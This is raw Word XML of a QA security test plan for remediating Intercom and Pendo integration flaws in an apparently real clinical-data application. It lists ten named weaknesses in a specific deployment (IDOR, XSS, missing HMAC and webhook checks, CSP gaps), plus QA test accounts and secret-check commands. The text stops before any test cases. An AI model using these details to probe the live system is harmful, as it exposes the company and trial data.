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814CF" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PRODUCTION-READY QA SECURITY TEST PLAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4320DD" w14:textId="6A038420" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Intercom &amp; Pendo Vulnerability Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3950AC0E" w14:textId="0A42135F" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B" w:rsidP="00FC43BF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="4" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E572E5" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD50FCC" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="3" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Section 1 — Vulnerability Register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCBE517" w14:textId="480A306B" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50" w:after="50"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t xml:space="preserve">10 vulnerabilities identified </w:t>
      </w:r>
      <w:r w:rsidR="008F6215" w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>across</w:t>
      </w:r>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>. Every TC in Section 3 maps to a Vuln ID below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08209759" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="6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1585"/>
        <w:gridCol w:w="1397"/>
        <w:gridCol w:w="1405"/>
        <w:gridCol w:w="807"/>
        <w:gridCol w:w="2208"/>
        <w:gridCol w:w="1338"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="45C3CFD5" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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AEBB3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Vuln ID</w:t>
            </w:r>
          </w:p>
        </w:tc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11EF9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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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E1457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OWASP / Ref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BF3E5F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Surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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8AA83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Sev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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241EC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Remediation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7EEDF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TC IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="40403BD7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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8EAB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V-01</w:t>
            </w:r>
          </w:p>
        </w:tc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1E54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Intercom Identity Verification disabled / HMAC not enforced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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6548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A07:2021 – Auth Failures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5703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Widget Boot (EDC+CSP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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E0DFF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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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BD5B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Enable Identity Verification; generate HMAC via INTERCOM_IDENTITY_SECRET in backend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1A9E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TC-IV-001–004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4B35EDB0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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48C0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V-02</w:t>
            </w:r>
          </w:p>
        </w:tc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D027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Intercom widget exposes PII (email,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user_id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) in browser console / network tab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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3ACD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A02:2021 – Crypto Failures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AEE1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Widget JS / Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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C48A9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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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C5B9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Strip secrets from client boot payload; move to server-side hash generation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3057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TC-PII-001–003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="54879956" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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C670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V-03</w:t>
            </w:r>
          </w:p>
        </w:tc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88B0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IDOR — cross-user conversation access via Intercom REST API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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B249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A01:2021 – Broken Access Control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7E84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REST API /conversations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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7F9AA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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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1B5D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Enforce per-user token scoping in backend Intercom client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AC79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TC-API-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="742713DD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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25BF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V-04</w:t>
            </w:r>
          </w:p>
        </w:tc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F303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XSS via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unsanitized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custom_attributes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injected into Intercom widget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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A1A1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A03:2021 – Injection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7588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Widget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custom_attributes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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BA554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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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27E8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HTML-encode all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custom_attributes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before passing to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window.Intercom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('update')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BDF6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TC-XSS-001–003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="18462C94" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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1F93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V-05</w:t>
            </w:r>
          </w:p>
        </w:tc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1F35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Pendo snippet loads PII (studyId,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siteId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, email) without data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minimisation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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22ED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A02:2021 – Crypto Failures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B07A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Pendo visitor metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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26C71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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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6D07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Remove PHI fields; pass only opaque IDs to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pendo.initialize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()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74B0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TC-PII-004–005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="619B23A6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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8E5D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V-06</w:t>
            </w:r>
          </w:p>
        </w:tc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6F65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Missing webhook signature validation (X-Hub-Signature-256 not verified)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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2499F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A08:2021 – Software Integrity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4052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Intercom Webhook Receiver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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59FC0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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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E5DA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Validate HMAC-SHA256 of raw payload against INTERCOM_WEBHOOK_SECRET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1B551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TC-WH-001–004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="15BA1D5E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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3732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V-07</w:t>
            </w:r>
          </w:p>
        </w:tc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6069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CSP missing *.intercom.io and </w:t>
            </w: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lastRenderedPageBreak/>
              <w:t>*.pendo.io — allows CDN bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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8DEF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lastRenderedPageBreak/>
              <w:t xml:space="preserve">A05:2021 – Security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Misconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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ECEC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HTTP Response Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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047DF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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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1EEB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Add script-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src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/connect-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src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directives for intercom.io, intercomcdn.com, pendo.io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0690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TC-CSP-001–002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="3BD00C89" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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5613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V-08</w:t>
            </w:r>
          </w:p>
        </w:tc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01C9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Pendo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trackEvent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leaks study subject identifiers in event properties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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5352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A02:2021 – Crypto Failures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5F04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Pendo Event Tracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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F3048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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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BE9E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Audit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pendo.track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() calls; replace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subjectId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with hashed/opaque token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877F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TC-PII-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="5E5405D8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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DC5A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V-09</w:t>
            </w:r>
          </w:p>
        </w:tc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36D8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Rate limiting absent on Intercom REST API proxy (backend)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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CDAA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A04:2021 – Insecure Design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D555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Backend API proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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FE38A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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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9056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Add 83 req/10s throttle on backend Intercom proxy; return 429 with Retry-After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19D1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TC-RL-001–002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4D0DECF8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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119C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V-10</w:t>
            </w:r>
          </w:p>
        </w:tc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750E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Clickjacking — Intercom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iframe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missing frame-ancestors CSP directive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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82ED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A05:2021 – Security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Misconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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A0EC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Intercom Widget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iframe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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4C660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7AE60"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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B168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Add Content-Security-Policy: frame-ancestors 'self' *.intercom.io</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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D42F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TC-CSP-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A48C2A2" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445F80D7" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="3" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Section 2 — Preconditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDE9698" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.1 Build &amp; Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C43FA91" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Build feature/EDC-42201 #1.0.0.4 deployed to QA environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F0731B" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Confirm deployment: curl -I https://edcapp-qa.medrio.com | grep x-build-version → 1.0.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C91E6" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Branch: feature/EDC-42201 — confirm HEAD SHA matches deployed artifact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F5FC25" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D6FE3F" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.2 Intercom Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE47273" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercom </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>app_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>app_edc_prod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> — confirm in browser source: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>window.intercomSettings.app_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A07B57D" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Identity Verification: Enabled in Intercom workspace → Settings → Identity Verification = ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA653D" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">HMAC Secret: echo $INTERCOM_IDENTITY_SECRET | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c → must be &gt; 0 (non-empty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339A8D22" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>API Version: All backend Intercom calls include header Intercom-Version: 2.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B251F20" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>CSP header: curl -I https://edcapp-qa.medrio.com/dashboard | grep content-security-policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A27FD4B" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B2D0AF4" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.3 Test Accounts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00"/>
        <w:gridCol w:w="2760"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="38F516CE" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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9EAEA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Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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5D64B" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/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user_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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AD96D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email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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4372A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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="34529FD4" w14:textId="77777777"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8C0C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EDC Site User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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8EB1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usr_qa_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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E8AF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qa_user@medrio.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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5405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Happy path + PII tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="26A52D9B" w14:textId="77777777"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A477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lastRenderedPageBreak/>
              <w:t>EDC Sponsor (User B)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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50DC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usr_qa_002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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D774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qa_sponsor@medrio.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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6F58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IDOR cross-user tests (TC-API-002)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="2879FD44" w14:textId="77777777"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361A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Admin account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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7504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usr_qa_admin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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F047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qa_admin@medrio.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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A1E5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Scope-limited token tests (TC-API-004)</w:t>
            </w:r>
          </w:p>
